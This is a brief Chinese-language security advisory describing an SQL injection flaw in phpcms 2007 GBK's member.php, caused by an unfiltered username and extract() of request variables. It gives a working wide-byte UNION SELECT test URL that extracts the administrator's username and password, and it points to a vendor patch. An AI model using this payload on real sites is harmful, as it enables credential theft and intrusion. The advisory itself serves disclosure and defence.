phpcms 2007网站管理系统Member.php页面SQL注入漏洞
影响版本:
phpcms 2007 GBK
漏洞描述:
在member/member.php的第4行,代码如下:
1. ..............
2. $m = $db->get_one( SELECT * FROM .TABLE_MEMBER. m , .TABLE_MEMBER_INFO. i WHERE m.userid=i.userid AND m.username=
3. $username
4. , CACHE ,86400);
5. ..............
username变量未经过过滤就进入查询了,我们在其包含的include/common.inc.php文件中有如下代码:
1. ................
2. @extract($_POST, EXTR_OVERWRITE);
3. @extract($_GET, EXTR_OVERWRITE);
4. ...............
<*参考
http://www.syue.com
*>
测试方法:
http://syue.com/phpcms/member/member.php?username=luoye%cf union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,username,password,57,58,59,60,61,62,63,64,65/**/from/**/phpcms_member/**/where/**/userid=1/*
安全建议:
厂商补丁:
PHPCMS 2007
----------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.phpcms.cn